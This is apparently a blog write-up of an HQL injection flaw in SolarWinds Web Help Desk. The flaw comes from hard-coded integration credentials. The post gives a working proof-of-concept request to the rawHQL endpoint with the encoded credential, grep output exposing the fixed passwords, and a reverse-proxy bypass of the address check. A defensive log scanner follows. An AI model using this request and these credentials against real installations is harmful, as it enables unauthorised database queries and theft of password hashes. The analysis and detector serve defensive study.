Post (Published)
Date: Dec 14, 2022
Tags: Vulnerability, Business Security
Category: Vulnerability Analysis
Property: Feb 9, 2023 07:32 AM
HQL queries are parsed and interpreted by the Hibernate engine and then translated into SQL.
Vulnerability description
SolarWinds Web Help Desk has an HQL injection vulnerability that stems from hard-coded credentials found in the SolarWinds Web Help Desk product. An attacker can exploit it to run arbitrary HQL queries against the database and steal users' password hashes or insert arbitrary data into the database.
Affected versions
≤ 12.7.6
Environment setup
Click through the installer with the defaults.

Skip the e-mail verification and enter a username and password.
Vulnerability reproduction
The PoC is as follows:
POST /helpdesk/assetReport/rawHQL HTTP/1.1
Host: localhost:8443
Cookie: XSRF-TOKEN=1b4b5cb9-770c-413d-8e1b-958f6eb1a7b2; JSESSIONID=C7790075346FBCD756B1262AD89CCD14; woinst=-1; whduser_helpdesk=admin
X-XSRF-TOKEN: 1b4b5cb9-770c-413d-8e1b-958f6eb1a7b2
Authorization: Basic aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA==
Pragma: no-cache
Cache-Control: no-cache
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.56
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

select 1

Vulnerability analysis
The request format is /helpdesk/WebObjects/HelpDesk.woa. Routing is controlled by Spring together with private code. Because of the hard-coding problem, a fixed username and password turned up while auditing the JSP code:
Searching the whole tree for that string shows that ConstantAndSettings defines two sets of hard-coded credentials, Production and Development:
There are further references, mainly in RestClient, RouteController and the authentication managers:
grep -R "dev-C4F8025E7" ./
./helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp: var auth = {loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'};
./helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp: var auth = {loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'};
./helpdesk/WEB-INF/lib/whd-core/com/macsdesign/whd/rest/controllers/BasicAuthRouteController$1.class
./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.class
grep -R helpdesk91114AD77B4CDCD9E18771057190C08B ./
./helpdesk/WEB-INF/lib/whd-core/com/macsdesign/whd/rest/controllers/BasicAuthRouteController$1.class
./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/rest/RestClient.class
./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/ClusterNodeAuthenticationManager.class
./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.class
./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/ClusterLicenseServiceImpl$RestClient.class
The referenced routes are located in whd-web.jar/whd-security.xml:
Among them, AssetReportController defines the /rawHQL endpoint, which executes HQL statements:
Back in HelpdeskIntegrationAuthenticationManager, the fixed passwords for Production and Development mode are read and used as the authentication credentials:
Note that there is a remote-address check in there; skip it for now and test locally by adding the Basic-Auth header aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA==

The endpoint also requires the X-XSRF-TOKEN header; with that in place the statement can be built. Reaching the endpoint remotely additionally requires a reverse proxy to be configured.
In testing, remote access to /helpdesk/assetReport/rawHQL returns 404, because HelpdeskIntegrationAuthenticationManager checks the remote address:
It reads the address through request.getRemoteAddress, so in a reverse-proxy deployment the check can be bypassed.
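As an added, defender-side example (not code from the original post or from SolarWinds), the Python scanner below flags requests to the rawHQL endpoint and any Basic credential that presents one of the hard-coded integration account names seen in the grep output above. The proxy log format that records the Authorization header and the sample lines are constructed assumptions; only the user-name half of a decoded credential is ever inspected.

```python
import base64
import re
from collections import namedtuple

RAWHQL_PATH = "/helpdesk/assetReport/rawHQL"
# Integration account names taken from the grep output in the analysis above.
HARDCODED_USERS = {"helpdesk91114AD77B4CDCD9E18771057190C08B", "helpdeskIntegrationUser"}
# The Authorization header value from the PoC request above.
POC_AUTH_HEADER = "Basic aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA=="
# Constructed proxy log format: client ip, quoted request line, status, quoted Authorization header.
LINE_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) "(?P<auth>[^"]*)"$')
Finding = namedtuple("Finding", "ip path reason")

def basic_auth_user(header):
    """User name from a 'Basic <base64>' header; None for other schemes or undecodable tokens."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, _secret = decoded.partition(":")  # the secret is discarded, never stored or logged
    return user

def scan(lines):
    """Flag rawHQL hits and any use of the hard-coded integration accounts."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        path = m["path"].split("?", 1)[0]  # drop any query string before comparing
        if path == RAWHQL_PATH:
            findings.append(Finding(m["ip"], path, "rawHQL endpoint accessed"))
        user = basic_auth_user(m["auth"])
        if user in HARDCODED_USERS:
            findings.append(Finding(m["ip"], path, f"hard-coded account {user} presented"))
    return findings

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 "GET /helpdesk/WebObjects/HelpDesk.woa HTTP/1.1" 200 "-"',
    f'203.0.113.7 "POST /helpdesk/assetReport/rawHQL HTTP/1.1" 200 "{POC_AUTH_HEADER}"',
    '203.0.113.7 "GET /helpdesk/assetReport/list HTTP/1.1" 404 "Basic '
    + base64.b64encode(b"helpdeskIntegrationUser:x").decode() + '"',
    '192.0.2.9 "GET /helpdesk/ HTTP/1.1" 200 "Basic not-base64!"',
]
```

Running scan(SAMPLE_LOG) yields three findings: two for the rawHQL request (endpoint hit plus hard-coded account) and one for the integration account used against another path; the malformed header on the last line is ignored.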
- Author: w1nk1
- URL: https://notion-w1nk1.vercel.app//article/494157b0-261c-4fe3-bcd1-579a6dcd64ec
- Copyright: All articles in this blog, except for special statements, adopt the BY-NC-SA agreement. Please indicate the source!